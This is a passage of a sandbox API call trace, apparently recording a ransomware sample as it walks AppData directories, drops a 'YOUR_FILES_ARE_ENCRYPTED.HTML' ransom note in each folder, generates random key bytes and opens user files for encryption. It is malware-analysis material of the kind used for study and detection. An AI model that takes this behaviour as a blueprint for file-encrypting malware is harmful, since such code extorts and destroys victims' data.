ftCreationTime.dwLowDateTime=0x65dad7a, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x65dad7a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xa5c4b8fa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x14a, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 1 [0122.364] StrStrIW (lpFirst="FB0D848F74F70BB2EAA93746D24D9749", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.364] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749") returned 111 [0122.364] PathFindExtensionW (pszPath="FB0D848F74F70BB2EAA93746D24D9749") returned="" [0122.365] lstrlenW (lpString="") returned 0 [0122.365] PathFindExtensionW (pszPath="FB0D848F74F70BB2EAA93746D24D9749") returned="" [0122.365] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x65dad7a, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x65dad7a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xa5c4b8fa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x14a, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 0 [0122.365] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0122.367] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0122.367] GetProcessHeap () returned 0x600000 [0122.367] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.372] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0122.378] CloseHandle (hObject=0x308) returned 1 [0122.378] GetProcessHeap () returned 0x600000 [0122.378] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.379] GetProcessHeap () returned 0x600000 [0122.379] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0122.379] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa7f57eb7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7f57eb7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f140, dwReserved1=0x63c558, cFileName="MetaData", cAlternateFileName="")) returned 0 [0122.380] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0122.380] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0122.380] GetProcessHeap () returned 0x600000 [0122.380] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\locallow\\microsoft\\cryptneturlcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0122.384] WriteFile (in: hFile=0x30c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.389] CloseHandle (hObject=0x30c) returned 1 [0122.446] GetProcessHeap () returned 0x600000 [0122.446] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.446] GetProcessHeap () returned 0x600000 [0122.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0122.453] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53df524e, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53df524e, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53df524e, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c5a6, dwReserved1=0x63c550, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0122.453] StrStrIW (lpFirst="Internet Explorer", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.453] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned 70 [0122.453] GetProcessHeap () returned 0x600000 [0122.453] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0122.454] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer" [0122.454] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*" [0122.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53df524e, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53df524e, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53df7964, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f140, dwReserved1=0x63c558, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0122.455] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53df524e, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53df524e, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53df7964, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f140, dwReserved1=0x63c558, cFileName="..", cAlternateFileName="")) returned 1 [0122.455] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53df7964, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53df7964, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53df7964, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f140, dwReserved1=0x63c558, cFileName="Services", cAlternateFileName="")) returned 1 [0122.455] StrStrIW (lpFirst="Services", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.455] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned 79 [0122.455] GetProcessHeap () returned 0x600000 [0122.455] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0122.456] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" [0122.456] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*" [0122.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53df7964, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53df7964, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53fe9a43, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0122.456] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53df7964, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53df7964, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53fe9a43, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0122.456] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53fe9a43, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53fe9a43, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53feadb6, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 1 [0122.456] StrStrIW (lpFirst="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.456] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned 129 [0122.456] PathFindExtensionW (pszPath="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned=".ico" [0122.456] lstrlenW (lpString=".ico") returned 4 [0122.456] PathFindExtensionW (pszPath="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned=".ico" [0122.456] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53fe9a43, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53fe9a43, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53feadb6, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 0 [0122.456] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0122.458] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0122.458] GetProcessHeap () returned 0x600000 [0122.458] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\locallow\\microsoft\\internet explorer\\services\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.459] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0122.460] CloseHandle (hObject=0x308) returned 1 [0122.461] GetProcessHeap () returned 0x600000 [0122.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.461] GetProcessHeap () returned 0x600000 [0122.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0122.461] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53df7964, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53df7964, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53df7964, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f140, dwReserved1=0x63c558, cFileName="Services", cAlternateFileName="")) returned 0 [0122.461] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0122.461] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0122.461] GetProcessHeap () returned 0x600000 [0122.461] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\locallow\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0122.463] WriteFile (in: hFile=0x30c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.464] CloseHandle (hObject=0x30c) returned 1 [0122.464] GetProcessHeap () returned 0x600000 [0122.464] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.464] GetProcessHeap () returned 0x600000 [0122.464] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0122.465] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x53df524e, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53df524e, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53df524e, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c5a6, dwReserved1=0x63c550, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0122.465] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0122.465] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0122.465] GetProcessHeap () returned 0x600000 [0122.466] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0122.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\locallow\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0122.499] WriteFile (in: hFile=0x318, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0122.500] CloseHandle (hObject=0x318) returned 1 [0122.500] GetProcessHeap () returned 0x600000 [0122.500] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0122.500] GetProcessHeap () returned 0x600000 [0122.500] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0122.502] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0122.502] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0122.503] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0122.503] GetProcessHeap () returned 0x600000 [0122.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0122.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\locallow\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0122.504] WriteFile (in: hFile=0x304, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0122.507] CloseHandle (hObject=0x304) returned 1 [0122.508] GetProcessHeap () returned 0x600000 [0122.508] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0122.508] GetProcessHeap () returned 0x600000 [0122.508] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0122.511] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x532a71a5, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x532a71a5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="Roaming", cAlternateFileName="")) returned 1 [0122.511] StrStrIW (lpFirst="Roaming", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.511] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 41 [0122.511] GetProcessHeap () returned 0x600000 [0122.511] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0122.515] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming" [0122.515] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*" [0122.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x532a71a5, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x532a71a5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0122.516] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x532a71a5, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x532a71a5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="..", cAlternateFileName="")) returned 1 [0122.517] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c6a810, ftCreationTime.dwHighDateTime=0x1d6fb73, ftLastAccessTime.dwLowDateTime=0x83c3b310, ftLastAccessTime.dwHighDateTime=0x1d6fe14, ftLastWriteTime.dwLowDateTime=0x83c3b310, ftLastWriteTime.dwHighDateTime=0x1d6fe14, nFileSizeHigh=0x0, nFileSizeLow=0x161a7, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="-Ou_.avi", cAlternateFileName="")) returned 1 [0122.517] StrStrIW (lpFirst="-Ou_.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.517] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-Ou_.avi") returned 50 [0122.517] PathFindExtensionW (pszPath="-Ou_.avi") returned=".avi" [0122.517] lstrlenW (lpString=".avi") returned 4 [0122.517] PathFindExtensionW (pszPath="-Ou_.avi") returned=".avi" [0122.518] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-Ou_.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-ou_.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0122.525] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=90535) returned 1 [0122.525] GetProcessHeap () returned 0x600000 [0122.525] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.528] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="BA") returned 2 [0122.528] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="CF") returned 2 [0122.528] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="47") returned 2 [0122.528] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="89") returned 2 [0122.528] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="C5") returned 2 [0122.528] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="96") returned 2 [0122.528] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="0F") returned 2 [0122.529] wsprintfW (in: 